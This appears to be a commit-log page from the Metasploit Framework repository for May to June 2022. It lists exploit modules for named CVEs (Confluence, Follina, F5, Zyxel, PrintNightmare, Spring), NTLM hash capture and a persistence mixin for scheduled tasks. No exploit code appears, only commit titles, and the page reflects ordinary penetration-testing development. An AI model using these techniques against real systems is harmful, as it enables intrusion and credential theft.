Compare commits

...

5958 Commits

Author SHA1 Message Date
Grant Willcox fd5e483b3c Land #16662, Add faraday retry gem dependency 2022-06-09 09:41:47 -05:00
adfoster-r7 f4f9580412 Add faraday retry gem dependency 2022-06-09 02:09:28 +01:00
Grant Willcox 63822f6e37 Land #16651, [SQLi library] Ensure the encoder is always used in the #test_vulnerable methods 2022-06-08 17:15:22 -05:00
Redouane NIBOUCHA 88036a7f1f Check for nil before using the decoder in test_vulnerable 2022-06-08 22:00:03 +02:00
Metasploit 9e3b1caf16 automatic module_metadata_base.json update 2022-06-08 13:35:28 -05:00
Jack Heysel 67ea2bc23c Land #16630 Fix duplicate ntlm hash storage
Net-NTLM (v1 and v2) hashes were being duplicated when
stored in the database due to the unique data in the challenge
dispite being the same. This fixes that issue
2022-06-08 14:07:34 -04:00
jheysel-r7 1a7cbe5b4f Update lib/msf/core/exploit/remote/smb/server/hash_capture.rb 2022-06-08 13:45:57 -04:00
Metasploit 365efba76b automatic module_metadata_base.json update 2022-06-08 12:15:23 -05:00
Grant Willcox 12cc1c871d Land #16661, Add SAN support to impersonate_ssl module 2022-06-08 11:54:05 -05:00
Grant Willcox ab322d9318 Add minor review improvements for code readability and future travelers 2022-06-08 11:53:42 -05:00
Dan Staples a55aa8492c Add SAN support to impersonate_ssl module 2022-06-08 11:22:06 -04:00
Metasploit e957e0ea80 automatic module_metadata_base.json update 2022-06-07 16:20:37 -05:00
bwatters 3875db78ae Land #16644, Add Exploit for CVE-2022-26134 (Confluence RCE)
Merge branch 'land-16644' into upstream-master
2022-06-07 16:00:37 -05:00
Grant Willcox a983bbd8ba Land #16615, Solicited multicast-address creation bugfix 2022-06-07 14:41:52 -05:00
Grant Willcox 5e69de43a8 Land #16645, Weekly dependency updates for Gemfile.lock 2022-06-07 11:58:51 -05:00
Metasploit 9b180c9e14 Weekly dependency updates for Gemfile.lock 2022-06-07 11:31:32 -05:00
jheysel-r7 2b99967d0c Merge branch 'master' into fix/duplicate-netntlm 2022-06-07 11:42:51 -04:00
Metasploit 5880a0dcea automatic module_metadata_base.json update 2022-06-07 09:19:11 -05:00
Grant Willcox 8584014af2 Land #16583, Bump payloads version to 2.0.93 2022-06-07 08:58:56 -05:00
Spencer McIntyre 1a06f69f95 Works through v7.18 now too 2022-06-06 22:03:21 -04:00
Spencer McIntyre 45c646afea Refactor #encode_ognl 2022-06-06 18:15:44 -04:00
Spencer McIntyre 2c0e034a18 Fix a couple of typos 2022-06-06 18:14:05 -04:00
Redouane NIBOUCHA 5331c343a0 Use the encoder in all the #test_vulnerable methods from the common class 2022-06-06 23:13:26 +02:00
Metasploit 1bb93ddfd2 automatic module_metadata_base.json update 2022-06-06 15:02:58 -05:00
bwatters c751ef46c9 Land #16635, Add 0-day MSWord RCE #Follina CVE-2022-30190
Merge branch 'land-16635' into upstream-master
2022-06-06 14:41:31 -05:00
bwatters 24a0e7622d Land #16653, Fix smb named pipe pivot crash
Merge branch 'land-16653' into upstream-master
2022-06-06 14:33:07 -05:00
Metasploit 4dd6b936b6 automatic module_metadata_base.json update 2022-06-06 12:25:38 -05:00
Grant Willcox 50ba5f580c Land #16643 - Fix exploits/multi/http/php_fpm_rce for ruby 3 2022-06-06 12:04:36 -05:00
adfoster-r7 6e9765992c Fix smb named pipe pivot crash 2022-06-06 13:00:42 +01:00
Spencer McIntyre 1aec2e8649 Note version in the docs 2022-06-03 18:29:28 -04:00
Spencer McIntyre f55334f0fe Add version detection 2022-06-03 18:26:04 -04:00
Spencer McIntyre 600fba7fa1 Add module docs 2022-06-03 17:26:15 -04:00
Spencer McIntyre 76ec36a091 Remove the Windows targets for now 2022-06-03 16:50:13 -04:00
Spencer McIntyre 29a9ef686a Finish up a draft of the module 2022-06-03 16:47:02 -04:00
Spencer McIntyre cd6bbeb0ba WIP module 2022-06-03 15:27:13 -04:00
Kert Ojasoo 1dc61d02eb Update php_fpm_rce.rb 2022-06-03 11:23:53 +03:00
Metasploit e79161c236 Bump version of framework to 6.2.2 2022-06-02 12:05:08 -05:00
Jack Heysel 8ccc1ebf91 Land PR #16628, Log ntlm_session hashes
This PR fixes the logging and storing of
NTLM session hashes
2022-06-02 11:20:37 -04:00
Metasploit 6942e0ca0e automatic module_metadata_base.json update 2022-06-02 08:52:54 -05:00
Christophe De La Fuente 474116d413 Land #16611, DotCMS File Upload to RCE Module (CVE-2022-26352) 2022-06-02 15:30:10 +02:00
Grant Willcox 44a22ab720 Land #16640, Patch LDAP for sychronous reads 2022-06-01 16:12:09 -05:00
RAMELLA Sébastien 3ab06461af fix. second review 2022-06-02 00:58:20 +04:00
RAMELLA Sébastien dd1814903c fix. SRVHOST default value 2022-06-02 00:07:15 +04:00
RAMELLA Sébastien 8c19a02835 fix. first review 2022-06-01 20:15:08 +04:00
Metasploit f036950ea1 automatic module_metadata_base.json update 2022-06-01 10:49:34 -05:00
space-r7 6d3ccab1be Land #16435, add Microsoft SQL Server sqli support 2022-06-01 10:27:48 -05:00
jheysel-r7 97caca4f6e Update modules/exploits/multi/http/dotcms_file_upload_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2022-06-01 10:54:02 -04:00
Metasploit 87e7e5c813 automatic module_metadata_base.json update 2022-05-31 11:29:18 -05:00
Jack Heysel bea4207c62 Land PR #16607 - MyBB RCE Module (CVE-2022-24734)
This exploit module leverages an improper input validation
vulnerability in MyBB prior to 1.8.30 to execute arbitrary
code in the context of the user running the application.
2022-05-31 11:59:53 -04:00
Metasploit 3261cd1ee3 automatic module_metadata_base.json update 2022-05-31 05:23:36 -05:00
Christophe De La Fuente dac355d9cf Land #16492, nfs_mount more intelligent mountability 2022-05-31 11:56:19 +02:00
RAMELLA Sébastien 7f89e92da3 add more informations about 2022-05-31 00:12:30 +04:00
Jack Heysel 2c02a607ee Responded to PR feedback 2022-05-30 14:46:54 -04:00
RAMELLA Sébastien 97921b4ed9 fix chmod 644 2022-05-30 22:11:35 +04:00
RAMELLA Sébastien dfc226cf5f add. Supposed 0day MSWord RCE 2022-05-30 21:23:18 +04:00
h00die c6936bd42f nfs mount more intelligent 2022-05-30 13:03:03 -04:00
Christophe De La Fuente b996f5ee49 Fixes from code review 2022-05-30 16:24:18 +02:00
h00die 627605cf82 nfs mount more intelligent 2022-05-30 09:49:24 -04:00
h00die b8cebe0dbe nfs mount more intelligent 2022-05-30 09:47:00 -04:00
Spencer McIntyre 1466506069 Update the docs to be accurate 2022-05-27 14:41:06 -04:00
Spencer McIntyre a47b3fe694 Don't report duplicate Net-NTLM hashes 2022-05-27 14:13:06 -04:00
Metasploit b464f97c5e automatic module_metadata_base.json update 2022-05-27 11:51:08 -05:00
adfoster-r7 a98f9a69c4 Land #16621, Fix timeout of duplicated sessions 2022-05-27 17:30:56 +01:00
Spencer McIntyre 0c481ed9c9 Patch LDAP for synchronous reads 2022-05-27 10:57:28 -04:00
Spencer McIntyre 1e5f86703f Report the correct JtR type 2022-05-27 10:16:02 -04:00
Spencer McIntyre 862c6a94a2 Log ntlm_session hashes too
Despite being called ntlm_session, these hashes are capable of being
cracked as the John 'netntlm' format. Additionally the format is
reported as NTLMv1-SSP in similar tools.
2022-05-27 10:07:39 -04:00
sjanusz 7b75bd6e27 Cache remote Python binary name 2022-05-27 10:21:59 +01:00
Metasploit a1613d6070 Bump version of framework to 6.2.1 2022-05-26 12:04:57 -05:00
Spencer McIntyre ba9ac52b2c Land #16622, Bump Metasploit version to 6.2.0 2022-05-26 11:59:09 -04:00
adfoster-r7 3e16e69b7e Land #16620, Bump RubySMB, Add File Server Tool 2022-05-26 16:55:16 +01:00
Metasploit e6e181618a automatic module_metadata_base.json update 2022-05-25 12:24:54 -05:00
Spencer McIntyre 9b36364acd Land #16619, fix of improper neighbor filtering
Fixes #16618
2022-05-25 13:03:39 -04:00
Metasploit 9dec324f98 automatic module_metadata_base.json update 2022-05-25 11:58:10 -05:00
Spencer McIntyre 5f5444936f Land #16488, Windows Task Scheduler Mixin 2022-05-25 12:37:03 -04:00
sjanusz 17a37a9d4d Detect more Python binaries & don't run last cmd_exec as channelized 2022-05-25 15:21:40 +01:00
Spencer McIntyre 8f8dc4baaf We in metasploit land now 2022-05-25 09:16:19 -04:00
Metasploit d856f50c7e automatic module_metadata_base.json update 2022-05-25 07:44:52 -05:00
adfoster-r7 d225d4663c Land #16413, update local exploit suggester 2022-05-25 13:24:11 +01:00
adfoster-r7 c4f004423e Bump Metasploit framework version to 6.2.0 2022-05-25 12:32:58 +01:00
Christophe De La Fuente 52a8191821 Fix vss_persistence module and remove Windows 7 target 2022-05-25 13:11:34 +02:00
sjanusz 6b1faf0e0e Add 'run' commands to Local Exploit Suggester docs 2022-05-25 12:05:06 +01:00
sjanusz 5d2ab0c55e Sort arch, platforms, session types before outputting 2022-05-25 10:25:32 +01:00
Metasploit acae5f60a1 automatic module_metadata_base.json update 2022-05-24 15:48:33 -05:00
Jack Heysel 44ce4d422e Land #16610, New Print Nightmare Exploit
Updates existing Print Nightmare module to use the
new SMB Server added in #16481.
2022-05-24 16:24:47 -04:00
Spencer McIntyre c41387dcbb Add the smb_file_server tool 2022-05-24 15:29:51 -04:00
Spencer McIntyre ba7334390b Bump RubySMB to 3.1.3 2022-05-24 15:04:11 -04:00
NikitaKovaljov 3eb8f8cf2e fix of improper NA filtering. 2022-05-24 19:01:36 +03:00
sjanusz fbac2ae429 Fix crash on sessions without native_arch support 2022-05-24 16:27:16 +01:00
Christophe De La Fuente 2bf0107865 Update the cmd_exec_with_result documentation 2022-05-24 17:22:07 +02:00
dwelch-r7 5f73401ab7 Bump payloads version 2022-05-24 16:06:42 +01:00
dwelch-r7 a911a9185a Update cached sizes 2022-05-24 16:04:03 +01:00
dwelch-r7 21a34b2f50 bump payload version 2022-05-24 16:04:03 +01:00
dwelch-r7 0df1f58480 Update cached sizes 2022-05-24 16:04:00 +01:00
dwelch-r7 25e1e5db1f Bump payloads version to 2.0.92 2022-05-24 16:04:00 +01:00
Jack Heysel 9d9d81a855 Docs update 2022-05-24 10:16:36 -04:00
sjanusz 7734161ffc Update Local Exploit Suggester documentation 2022-05-24 14:48:40 +01:00
sjanusz 0e241557e9 Add session type column, refactor to not use post mixin, use native_arch 2022-05-24 14:28:21 +01:00
NikitaKovaljov c33f284786 change from lambda to line by line logic 2022-05-24 16:24:15 +03:00
Spencer McIntyre 1524020643 Use moved_from to deprecate the module 2022-05-24 09:16:30 -04:00
dwelch-r7 f28acc37f6 Land #16608, Rename wiki files 2022-05-24 13:53:26 +01:00
adfoster-r7 18104c133f Rename wiki files 2022-05-24 13:46:51 +01:00
Metasploit ac63816923 automatic module_metadata_base.json update 2022-05-24 05:15:54 -05:00
Christophe De La Fuente 63dea932ad Land #16481, Update Msf::Exploit::Remote::SMB::Server::Share 2022-05-24 11:50:06 +02:00
Christophe De La Fuente bac9be956f Add documentation 2022-05-23 17:27:42 +02:00
Christophe De La Fuente 1f304ef2c4 Add module exploit for MyBB RCE - CVE-2022-24734 2022-05-23 17:27:20 +02:00
sjanusz 1677dbcf6d Add setting of module target 2022-05-23 14:23:48 +01:00
NikitaKovaljov 7f9ead454e bugfix of improper solicited address creation 2022-05-23 15:25:53 +03:00
Jack Heysel 3afb9b2ffe dotCMS file upload to RCE module 2022-05-20 15:57:22 -04:00
adfoster-r7 20198a2ff5 Land #16212, Add Java Meterpreter Feature Parity proposal 2022-05-20 19:19:49 +01:00
sjanusz b90f4933a1 Add Java Meterpreter Feature Parity proposal 2022-05-20 15:37:31 +01:00
dwelch-r7 d57914e336 Land #16601, Cleanup wiki docs cruft 2022-05-20 14:05:35 +01:00
adfoster-r7 7ad35f00da Cleanup wiki docs cruft 2022-05-20 13:47:30 +01:00
dwelch-r7 f60b34b439 Land #16600, Update docs site to use migrated wiki files 2022-05-20 13:37:13 +01:00
adfoster-r7 8e7fd0ee6f Update docs site to use migrated wiki files 2022-05-20 13:13:28 +01:00
dwelch-r7 4ecee9755c Land #16518, Merge metasploit framework wiki into metasploit framework 2022-05-20 12:59:28 +01:00
adfoster-r7 b3c2175a56 Migrate docs from https://github.com/rapid7/metasploit-framework/wiki to main repository 2022-05-20 12:22:19 +01:00
adfoster-r7 3663fbee4b Put markdown files into new folder metasploit-framework.wiki in preparation for migration 2022-05-20 12:22:06 +01:00
dwelch-r7 25d5da2a7b Land #16517, Prepare for migrating wiki to framework 2022-05-20 12:08:47 +01:00
adfoster-r7 b96cc4765a Use shorthand generation flags 2022-05-20 10:23:41 +01:00
adfoster-r7 f2d9ccfe9e Land #16596, Weekly dependency updates for Gemfile.lock 2022-05-19 23:25:57 +01:00
Metasploit 80cf407295 Weekly dependency updates for Gemfile.lock 2022-05-19 12:08:58 -05:00
Metasploit a2dc366eb4 Bump version of framework to 6.1.44 2022-05-19 12:04:44 -05:00
sjanusz 786084bacb Add custom color styler tests 2022-05-19 17:01:55 +01:00
sjanusz 7103a619c2 Add validation opts, tables, custom stylers to exploit suggester 2022-05-19 16:22:47 +01:00
adfoster-r7 eea4c17dca Simplify contributing steps 2022-05-19 16:10:47 +01:00
Metasploit 527015f03e automatic module_metadata_base.json update 2022-05-19 09:28:41 -05:00
Jack Heysel 19abce7045 Land #16505, Fix Lotus Domino Hash Parsing
This fixes an issue with the regex that was parsing
Lotus Domino hashes. The fix also changes the
regex to xml parsing
2022-05-19 10:00:36 -04:00
Jack Heysel 4f4287eb6b Module working on linux 2022-05-19 09:37:48 -04:00
Christophe De La Fuente 19f73b7bbe Fix specs (again) 2022-05-19 15:34:42 +02:00
Christophe De La Fuente fec3fbc180 Fix specs 2022-05-19 15:27:13 +02:00
Christophe De La Fuente 5fd18ef864 Fixes from review 2022-05-19 14:54:07 +02:00
Metasploit 2762b92c8e automatic module_metadata_base.json update 2022-05-18 19:00:36 -05:00
adfoster-r7 2cbd64b759 Land #16487, fix deprecation warning in auxiliary/capture/server/mssql as well as updating johntheripper format 2022-05-19 00:40:03 +01:00
adfoster-r7 10d325761f Remove deprecation notice title as it appears in the submenu links 2022-05-18 22:32:20 +01:00
adfoster-r7 64045571a4 Remove deprecation notice 2022-05-18 22:23:01 +01:00
adfoster-r7 4d2526a7a8 Remove deprecation notice 2022-05-18 22:22:47 +01:00
adfoster-r7 2cd21724e5 Update deprecation notice 2022-05-18 22:22:27 +01:00
Metasploit 1340ceaef7 automatic module_metadata_base.json update 2022-05-18 13:18:33 -05:00
dwelch-r7 ac5cd23bb3 Land #16588, Check size for compatibility with powershell 2022-05-18 18:59:13 +01:00
Christophe De La Fuente 624fc7a1d2 Fix specs 2022-05-18 17:07:30 +02:00
adfoster-r7 669d95ba16 Ensure files are correctly added to the migrated wiki 2022-05-18 15:22:31 +01:00
adfoster-r7 255452c5ca Update Wiki deprecation notice text, and add functionality to integrate the wiki into framework 2022-05-18 15:13:23 +01:00
adfoster-r7 20fc5c39d4 Add metadata tracking the page that generated the wiki page 2022-05-18 15:13:23 +01:00
Christophe De La Fuente 7c9c0018bc Add specs for the TaskScheduler mixin 2022-05-18 15:50:39 +02:00
Christophe De La Fuente 5d637b5292 Small fixes and improvements found while writing specs 2022-05-18 15:49:57 +02:00
dwelch-r7 37f214b7a7 Updated Meterpreter Debugging Meterpreter Sessions (markdown) 2022-05-18 14:10:06 +01:00
Christophe De La Fuente dba4c25a18 Fix #check_compatibility 2022-05-17 17:04:47 +02:00
Spencer McIntyre e629264678 Check size for compatibility with powershell 2022-05-17 09:28:07 -04:00
Christophe De La Fuente 7992cb2072 Update vss_persistenceand persistence_exe modules to includes
changes in `TaskScheduler` mixin
2022-05-17 14:52:47 +02:00
Christophe De La Fuente fb85d060ec Update TaskScheduler after first review
- Now, it exposes 4 methods to manage scheduled tasks: `#task_create`,
  `#task_start`, `#task_delete` and `#task_query`
- Adds `#check_compatibility` to check the OS version and make sure
  `schtasks.exe` and `reg.exe` options are compatible
- Adds `#log_and_print`to print log messages on the console (using
  `vprint_*` methods) and in the MSF logs at the same time
- `#get_system_privs` now takes care of checking if the session is a
  Meterpreter session and if it has loaded the appropriate extension
- Adds `#run_one_off_task` to run a command on a remote host by using
  another scheduled task
- Adds `#add_reg_key_value` to restores the Security Descriptor registry
  key value to unhide the task
2022-05-17 14:52:47 +02:00
Christophe De La Fuente c37387de78 Add #cmd_exec_with_result in lib/msf/core/post/common.rb 2022-05-17 14:52:47 +02:00
Christophe De La Fuente 14cd7bc335 Add task scheduler mixin and update persistence_exe and vss_persistence modules 2022-05-17 14:52:47 +02:00
dwelch-r7 e386dad7e9 Land #16584, Add loading test modules page 2022-05-17 11:03:35 +01:00
adfoster-r7 1b5f8a623a Add loading test modules page 2022-05-17 10:53:10 +01:00
Grant Willcox db1551e29b Created Loading Test Modules (markdown) 2022-05-16 18:19:49 -05:00
Spencer McIntyre 02e7a65b93 Just move the auxiliary module into an exploit 2022-05-16 17:44:31 -04:00
Spencer McIntyre 36921a00f6 Merge branch 'feat/mod/cve-2021-1675-retry' into feat/mod/cve-2021-1675 2022-05-16 14:59:32 -04:00
Spencer McIntyre d278ad9be1 Add the printnightmare exploit 2022-05-16 14:56:46 -04:00
Spencer McIntyre 75d137fce5 Rubocop and add todo to printnightmare 2022-05-16 14:56:46 -04:00
Metasploit a1555d4b87 automatic module_metadata_base.json update 2022-05-16 13:42:29 -05:00
Spencer McIntyre 19a9ff1198 Update a couple of modules for the new SMB server 2022-05-16 14:39:45 -04:00
Spencer McIntyre 3d3aa0f998 Update to RubySMB v3.1.2 for server requirements 2022-05-16 14:39:45 -04:00
Spencer McIntyre e0b9002238 Fix an SMB relay bug 2022-05-16 14:39:45 -04:00
Spencer McIntyre dd848859df Update the testing Gemfile to include more fscc 2022-05-16 14:39:45 -04:00
Spencer McIntyre edd977165c Revert option changes for the capture NTLM provider 2022-05-16 14:39:45 -04:00
Spencer McIntyre adeb87b817 Remove tests for code that was removed 2022-05-16 14:39:45 -04:00
Spencer McIntyre f6211f2e45 Add a Gemfile entry for testing
This adds a temporary Gemfile entry to a branch with all the necessary
dependencies merged together. It should be removed before the PR is
landed once an updated RubySMB gem can be released.
2022-05-16 14:39:45 -04:00
Spencer McIntyre f14f8da1df Use the new thread_factory 2022-05-16 14:39:45 -04:00
Spencer McIntyre b79b550d6c Centralize the log adapter
This should eventually be updated to map the levels to the framework
logger and appropriate module-print_* function.
2022-05-16 14:39:45 -04:00
Spencer McIntyre 7c15b144c4 Update the SMB capture server 2022-05-16 14:39:44 -04:00
Spencer McIntyre 22993e910e Move server code into the server mixin 2022-05-16 14:39:44 -04:00
Spencer McIntyre c39fd87073 Finish removing unneeded server code 2022-05-16 14:39:44 -04:00
Spencer McIntyre 906fdd6a05 Update the MSSQL capture module
Remove the apparently unused reference to the SMB server mixin.
2022-05-16 14:39:44 -04:00
Spencer McIntyre 475f6eee8c Capture hash when serving files over SMB 2022-05-16 14:39:44 -04:00
Spencer McIntyre d740786211 Add the on_client_connect callback
Also update the group_policy_startup module.
2022-05-16 14:39:44 -04:00
Spencer McIntyre 317516d90f Enable guest access 2022-05-16 14:39:44 -04:00
Spencer McIntyre 882bcf08f7 Fix bugs when stopping the service 2022-05-16 14:39:44 -04:00
Spencer McIntyre 09dc65eb6a Remove the FILE_CONTENTS datastore option
None of the 14 modules use this option, they all deregister it.
2022-05-16 14:39:44 -04:00
Spencer McIntyre 63af7cdef7 Initial update to the RubySMB share server 2022-05-16 14:39:44 -04:00
Spencer McIntyre 013a819cff Out with the old 2022-05-16 14:39:44 -04:00
Spencer McIntyre 879591f686 Land #16499, Specify peer hostname for SNI 2022-05-16 14:21:57 -04:00
Metasploit 55f74eb530 automatic module_metadata_base.json update 2022-05-16 12:52:31 -05:00
adfoster-r7 0196b6fa75 Land #16555, move duplicated retry_until_truthy code into centralized location 2022-05-16 18:31:57 +01:00
Spencer McIntyre f9a5d8285a Use the retry mixin for printnightmare
This module gets disconnected from the named pipe. Use the new retry
mixin to avoid waiting for a standard delay.
2022-05-16 09:53:57 -04:00
adfoster-r7 db694efd36 Improve relative redirect handling 2022-05-16 12:03:24 +01:00
Grant Willcox c415e7a8a0 Land #16572, Don't raise a space violation exception when space is 0 2022-05-13 19:20:24 -05:00
Metasploit 2ee029530b automatic module_metadata_base.json update 2022-05-13 19:15:25 -05:00
Grant Willcox 1959dac1df Reformat comments a bit and fix a typo. 2022-05-13 19:14:00 -05:00
Grant Willcox 133b9e307a Land #16563, Zyxel Firewall Unauthenticated Command Injection (CVE-2022-30525) 2022-05-13 18:55:30 -05:00
Jake Baines 39567281bf Revised setup guidance 2022-05-13 13:41:05 -07:00
Grant Willcox 2eb31cf765 Add in edits from review 2022-05-13 15:32:12 -05:00
Spencer McIntyre cb26d02518 Treat space = 0 as a special case
Space = 0 is a special case implying that the smallest payload possible
should be used. It's used by msfvenom when the --smallest flag is set.
It should not cause Metasploit to raise an exception.

Fixes #16471
2022-05-13 16:18:08 -04:00
Metasploit b3d686f43a automatic module_metadata_base.json update 2022-05-13 14:06:26 -05:00
bwatters 1fe04caadd Land #16406, Create get_bookmarks.rb
Merge branch 'land-16406' into upstream-master
2022-05-13 13:42:31 -05:00
bwatters 213d6a0918 Land #16570, set the org to be 0x400000
Merge branch 'land-16570' into upstream-master
2022-05-13 11:59:14 -05:00
Spencer McIntyre 1aceb71971 Rename the function to emphasize truthy 2022-05-13 09:16:01 -04:00
Spencer McIntyre 3d37f2f811 Change the timeout value to be nil 2022-05-13 09:14:23 -04:00
Spencer McIntyre 6ba2b15ab2 Overhaul retry_until_true specs
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2022-05-13 09:06:51 -04:00
adfoster-r7 739c0fcad1 Specify peer hostname for ssl connections 2022-05-13 13:55:43 +01:00
adfoster-r7 8a3f2b9542 Land #16566, Weekly dependency updates for Gemfile.lock 2022-05-13 12:57:52 +01:00
Metasploit 3ab64195d6 automatic module_metadata_base.json update 2022-05-13 06:37:44 -05:00
dwelch-r7 c0c02e56ba Land #16430, Improve kerberos user enum module 2022-05-13 12:17:26 +01:00
Metasploit 03b3336d62 automatic module_metadata_base.json update 2022-05-13 05:13:25 -05:00
adfoster-r7 6a1fe27406 Land #16442, add vars_form_data to the HTTP client 2022-05-13 10:53:16 +01:00
ssst0n3 246a3604b8 set the org to be 0x400000 2022-05-13 10:50:19 +08:00
Metasploit 4098db81c7 automatic module_metadata_base.json update 2022-05-12 17:58:10 -05:00
bwatters 934f193dc0 Land #16484, Add vcenter_forge_saml_token aux module
Merge branch 'land-16484' into upstream-master
2022-05-12 17:36:20 -05:00
Metasploit 59637e7a5d Weekly dependency updates for Gemfile.lock 2022-05-12 12:09:59 -05:00
Metasploit 93a7ae26a1 Bump version of framework to 6.1.43 2022-05-12 12:06:21 -05:00
Grant Willcox fad601d2ff Update status for items under Related Open Tickets section. 2022-05-12 12:02:14 -05:00
Jake Baines 23f8a0b915 Added Zyxel advisory. Added AKB reference. Used xpath as requested. 2022-05-12 07:17:37 -07:00
Jake Baines f3b23c072f Added a reference to Rapid7 disclosure 2022-05-12 06:33:27 -07:00
Jake Baines 24fa9aabe0 Fixed privilege flag. Swapped 'exploit' for 'command' in a couple of places 2022-05-12 06:24:33 -07:00
Simon Janusz 8d9635c047 Land #2, Update form data api defaults
Update form data api defaults
2022-05-12 13:49:54 +01:00
Metasploit a2ae8eaca9 automatic module_metadata_base.json update 2022-05-12 07:30:04 -05:00
dwelch-r7 d210d2fd2b Land #16544, Update ad_to_sqlite to store loot 2022-05-12 13:09:54 +01:00
Jake Baines 4af93ecfe2 Updated affected 2022-05-12 03:22:21 -07:00
Jake Baines da133a34c8 Updated affected 2022-05-12 03:22:02 -07:00
adfoster-r7 d40a2213eb Land #16560, support additional @ in the nessus password 2022-05-12 10:19:47 +01:00
Metasploit 5ab4721dd6 automatic module_metadata_base.json update 2022-05-12 04:12:51 -05:00
adfoster-r7 26e9beb623 Land #16558, Properly credit Azeria for shellcode 2022-05-12 09:52:28 +01:00
Jake Baines 617b4ae044 Initial commit of Zyxel unauth command injection (CVE=2022-30525) 2022-05-12 01:43:59 -07:00
Ronni3X 83bfc73e09 Update nessus.rb 2022-05-11 19:56:32 -04:00
Grant Willcox 93334b56ef Properly credit Azeria and also include blog post at her request 2022-05-11 18:43:27 -05:00
Metasploit 1e2d9eacd6 automatic module_metadata_base.json update 2022-05-11 18:27:15 -05:00
Grant Willcox 254480051d Land #16549, Added module for F5 iControl RCE (CVE-2022-1388) 2022-05-11 18:06:13 -05:00
Ronni3X 0a2293f20b Merge pull request #1 from Ronni3X/Ronni3X-nessus-plugin-patch-1
Update nessus.rb
2022-05-11 18:37:19 -04:00
Ronni3X 33cfc7ce71 Update nessus.rb
Changed the line that parses the input for the nessus_connect password. It will now split the user input by the last occurrence of the at sign (@) instead of the first occurrence. This will prevent improperly parsed passwords due to an at sign (@) in the password.
2022-05-11 18:33:33 -04:00
Grant Willcox 8dbd6f3334 Change default target to 1 so we get benefit of avoiding some timeout issues since Unix Command may still cause server's REST API to time out at times. 2022-05-11 16:43:37 -05:00
Grant Willcox 196aac6b42 Add in PrependFork and MeterpreterTryToFork options as default to fix timeout issues and potential failure cases due to server not responding 2022-05-11 16:43:36 -05:00
Grant Willcox 27169c4ae1 Add in missing CmdStager library, add some more attribution, and add in PoC link 2022-05-11 16:43:36 -05:00
Grant Willcox 6354d7a055 Redo explanation of exploit in documentation to appropriately account for various nuances. Also update exploit title and description accordingly. 2022-05-11 16:43:36 -05:00
Heyder Andrade 1bc2616c19 Update modules/exploits/linux/http/f5_icontrol_rce.rb
Co-authored-by: wvu <4551878+wvu@users.noreply.github.com>
2022-05-11 16:43:13 -05:00
Heyder Andrade 208367d735 Improved check method reliability
Extra modifications:
- Promote advanced options HttpUsername and HttpPassword
	- password is not really necessary, but if one have credential, can
	  use this module as an exec
- Fixed print statement on check
- Splitted execute_command in two, because we also send a command on the check
  methods, however we don't need the checks that are in the execute_command
2022-05-11 16:43:12 -05:00
Heyder Andrade 8a6dd7152e Added tested versions reference 2022-05-11 16:43:12 -05:00
Heyder Andrade 55163b86d6 Improvements
- Change module name and description
- Added author from the PoC
- Added reference
- Added payloads, targets and notes
- Removed headers used during the tests
2022-05-11 16:43:11 -05:00
Heyder Andrade 77f60eb21e Added module and documentation for f5 icontrol RCE (CVE-2022-1388) 2022-05-11 16:43:00 -05:00
Spencer McIntyre 8b52dbcaf9 Add a basic retry spec 2022-05-11 15:57:59 -04:00
Spencer McIntyre 05fcbd803e Add a new Retry mixin 2022-05-11 15:41:37 -04:00
jerrelgordon 535a6e752d Update get_bookmarks.rb
style changes made
2022-05-11 14:29:36 -04:00
adfoster-r7 e4f42d7eaa Update more modules to use the vars_form_data api 2022-05-11 18:18:21 +01:00
jerrelgordon 03d658c28d Update get_bookmarks.rb
style changes
2022-05-11 13:14:05 -04:00
jerrelgordon 119576916a Delete h
removed unknown file
2022-05-11 13:00:52 -04:00
jerrelgordon 606669e7cf Update modules/post/windows/gather/get_bookmarks.rb
Skip symbols for current and parent dir

Co-authored-by: Brendan <bwatters@rapid7.com>
2022-05-11 12:59:47 -04:00
Metasploit 110998d67b automatic module_metadata_base.json update 2022-05-11 10:36:59 -05:00
Grant Willcox 1c934b87b4 Land #16169, Add sploit for Cisco RV340 SSL VPN - CVE-2022-20699 2022-05-11 10:15:08 -05:00
Grant Willcox 68fdb103fe Add in final touch ups to documentation to fix a typo or two for formatting. Also update exploit ranking since this exploit doesn't retrieve version information before exploiting and is not 100% reliable so Excellent ranking isn't appropriate 2022-05-11 09:39:47 -05:00
adfoster-r7 0ba6b8e7c8 Land #16553, Correct color of big button to be pressed 2022-05-11 10:07:28 +01:00
mauvehed f1c6744e96 Correct color of big button to be pressed 2022-05-10 21:14:05 -05:00
jerrelgordon f5df9b500d Update to include Internet Explorer 2022-05-10 18:13:22 -04:00
jerrelgordon 6cfdc3d330 Updated to retrieve bookmarks for IE 2022-05-10 18:11:35 -04:00
Metasploit 6173835f49 automatic module_metadata_base.json update 2022-05-10 17:09:34 -05:00
Grant Willcox b920c04b75 Land #16548, Add Powershell Command Adapter 2022-05-10 16:47:57 -05:00
Grant Willcox 5a04f8253c Land #16551, Add docker documentation for tomcat mgr upload 2022-05-10 12:03:18 -05:00
Grant Willcox 6a7be290ff Add in minor changes to improve overall formatting and presentation of documentation 2022-05-10 12:02:45 -05:00
adfoster-r7 ff410b23a0 Add documentation for tomcat mgr upload 2022-05-10 17:01:40 +01:00
Metasploit 6dee08d379 automatic module_metadata_base.json update 2022-05-10 09:54:00 -05:00
Spencer McIntyre d5fb559e05 Land #16485, Allow all post-Vista builds 2022-05-10 10:32:09 -04:00
Metasploit 4772e0c4d8 automatic module_metadata_base.json update 2022-05-10 09:05:34 -05:00
bwatters 92715c883f Land #16423, Add module for exploit CVE-2022-22965
Merge branch 'land-16423' into upstream-master
2022-05-10 08:44:06 -05:00
bwatters 43f2b4dcf9 Quick update to the vulhub guidance 2022-05-10 08:42:02 -05:00
adfoster-r7 94e1ad3fe5 Update form data api defaults 2022-05-10 14:12:17 +01:00
bwatters db966b70e1 Merge smcintyre's changes 2022-05-10 07:58:26 -05:00
Simon Janusz 9c7929a506 Land #1, Form data api tweaks
Form data api tweaks
2022-05-10 10:07:10 +01:00
Grant Willcox 653e48eb3c Land #16539, Weekly dependency updates 2022-05-09 17:41:18 -05:00
Grant Willcox 25511a2156 Woops wrong version number, let me fix that 2022-05-09 14:52:49 -05:00
Grant Willcox e3558c939e Update Gemfile.lock to pull in latest changes to rex-socket to fix a typo issue noticed during weekly security review 2022-05-09 14:49:18 -05:00
Spencer McIntyre e48624558a Set the UUID arch and platform correctly 2022-05-09 11:55:57 -04:00
